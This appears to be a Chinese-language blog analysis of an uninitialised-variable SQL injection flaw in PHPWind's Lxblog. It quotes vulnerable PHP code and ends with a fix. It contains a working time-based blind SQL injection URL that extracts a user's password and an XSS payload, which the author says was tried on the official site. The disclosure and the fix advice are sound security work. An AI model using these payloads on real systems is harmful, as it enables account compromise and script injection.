Lxblog 是 PHPWind 開發(fā)的一套基于 PHP+MySQL 數(shù)據(jù)庫平臺架構(gòu)的多用戶博客系統(tǒng)，強調(diào)整站與用戶個體間的交互，擁有強大的個人主頁系統(tǒng)、獨立的二級域名體系、靈活的用戶模板系統(tǒng)、豐富的朋友圈和相冊功 能。但是該blog系統(tǒng)在安全性上并不讓人滿意，本文就來分析lxblog一個變量未初始化造成的sql注入漏洞。
我們先來分析一下這個漏洞，看代碼：
=======================code==================================
/user/tag.php
<?php
!function_exists('usermsg') && exit('Forbidden');
!in_array($type,$item_type) && exit;
//$type、$item_type均沒有初始化
require_once(R_P.'mod/charset_mod.php');
foreach ($_POST as $key => $value) {
${'utf8_'.$key} = $value;
${$key} = $db_charset != 'utf-8' ? convert_charset('utf-8',$db_charset,$value) : $value;
}
if ($job == 'add') {
……//省略部分代碼
}elseif($job=="modify"){
$tagnum="{$type}num";
$touchtagdb=$db->get_one("SELECT k.tags,i.uid FROM pw_{$type} k LEFT JOIN pw_items i ON i.itemid=k.itemid WHERE k.itemid='$itemid'");
//$type帶入查詢語句操作數(shù)據(jù)庫
$touchtagdb['uid']!=$admin_uid && exit;
……//省略部分代碼
=======================code==================================
當 然，在文件的第一行有 !function_exists('usermsg') && exit('Forbidden'); 這樣一段代碼的限制，我們不能直接訪問該文件，但是可以通過user_index.php來include這個文件執(zhí)行，看具體代碼
=======================code==================================
//user_index.php
<?php
……//省略部分代碼
require_once(R_P.'user/global.php');
require_once(R_P.'user/top.php');
if (!$action) {
……//省略部分代碼
} elseif ($action && file_exists(R_P."user/$action.php")) {
$basename = "$user_file?action=$action";
require_once(Pcv(R_P."user/$action.php"));
//通過提交$action=tag即可以調(diào)用到存在漏洞的文件
}
……//省略部分代碼
=======================code==================================
看到這個地方，應(yīng)該已經(jīng)可以觸發(fā)該漏洞了，但是依然要考慮到是否會受到register_global的影響，幸好user_index.php在開始的時候包含了user/global.php這個文件，看看這個文件為我們提供了什么
=======================code==================================
//user/global.php
<?
……//省略部分代碼
if (!in_array($action,array('blogdata','comment','itemcp','post','userinfo'))) {
//'blogdata','comment','itemcp','post','userinfo','global','top'
//我們提交的action=tag，不在上面這個數(shù)組里面，可以觸發(fā)下面的代碼成功繞過register_global的影響
foreach ($_POST as $_key => $_value) {
!ereg('^\_',$_key) && strlen(${$_key})<1 && ${$_key} = $_POST[$_key];
}
foreach ($_GET as $_key => $_value) {
!ereg('^\_',$_key) && strlen(${$_key})<1 && ${$_key} = $_GET[$_key];
}
}
……//省略部分代碼
=======================code==================================
通過上面的分析，我們已經(jīng)可以成功控制$type和$item_type的值了，但是還要注意兩個地方：
第一個地方是要滿足 in_array($type,$item_type)，我們通過直接將$type和$item_type[]賦值為相同變量即可
第二個地方是要注意我們注射的語句
$touchtagdb=$db->get_one("SELECT k.tags,i.uid FROM pw_{$type} k LEFT JOIN pw_items i ON i.itemid=k.itemid WHERE k.itemid='$itemid'");
綜合以上，我們構(gòu)造出來盲注的代碼如下
=======================poc==================================
//判斷uid=1的用戶的密碼第一位的ASCII值是否大于0
http://blog.xxx.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
=======================poc==================================
通 過瀏覽器返回的時間來判斷是否猜解正確，如果是正確的話，瀏覽器返回的比較慢，近似假死狀態(tài)，否則返回的就比較正常。使用二分法不斷猜解即可。另外，如果 數(shù)據(jù)庫版本較低，可以使用benchmark函數(shù)來盲注，具體的expliot就不提供了，有需要的可以自己寫個代碼跑跑，不是什么難事。
另外我們看下lxblog的數(shù)據(jù)庫容錯代碼
=======================code==================================
function DB_ERROR($msg) {
global $db_blogname,$REQUEST_URI;
$sqlerror = mysql_error();
$sqlerrno = mysql_errno();
//ob_end_clean();
echo"<html><head><title>$db_blogname</title><style type='text/css'>P,BODY{FONT-FAMILY:tahoma,arial,sans-serif;FONT-SIZE:11px;}A { TEXT-DECORATION: none;}a:hover{ text-decoration: underline;}TD { BORDER-RIGHT: 1px; BORDER-TOP: 0px; FONT-SIZE: 16pt; COLOR: #000000;}</style><body>\n\n";
echo"<table style='TABLE-LAYOUT:fixed;WORD-WRAP: break-word'><tr><td>$msg";
echo"<br><br><b>The URL Is</b>:<br>http://$_SERVER[HTTP_HOST]$REQUEST_URI";
echo"<br><br><b>MySQL Server Error</b>:<br>$sqlerror ( $sqlerrno )";
echo"<br><br><b>You Can Get Help In</b>:<br><a target=_blank href=http://www.phpwind.net><b>http://www.phpwind.net</b></a>";
echo"</td></tr></table>";
exit;
}
=======================code==================================
函數(shù)直接將造成數(shù)據(jù)庫錯誤的url返回給客戶端，對輸出未作任何過濾，造成了xss漏洞，下面是我對官方的測試：
=======================poc==================================
http://www.lxblog.net/user_index.php?action=tag&job=modify&type=<script>alert(/xss/)</script>&item_type[]=<script>alert(/xss/)</script>
=======================poc==================================
Lxblog 的漏洞就分析到這里了，這個漏洞的修補也很簡單，只要在數(shù)據(jù)庫查詢語句前面將變量$item_type賦值為指定的數(shù)組就可以了。網(wǎng)上的PHP程序有不少 都存在類似的漏洞，由于變量沒有被正確的初始化，從而導致攻擊者可以控制變量被改變程序的流程執(zhí)行一些非法操作。其實這個問題并不復(fù)雜，保持一個良好的編 碼習慣，正確初始化類和變量即可杜絕此類漏洞。

最新評論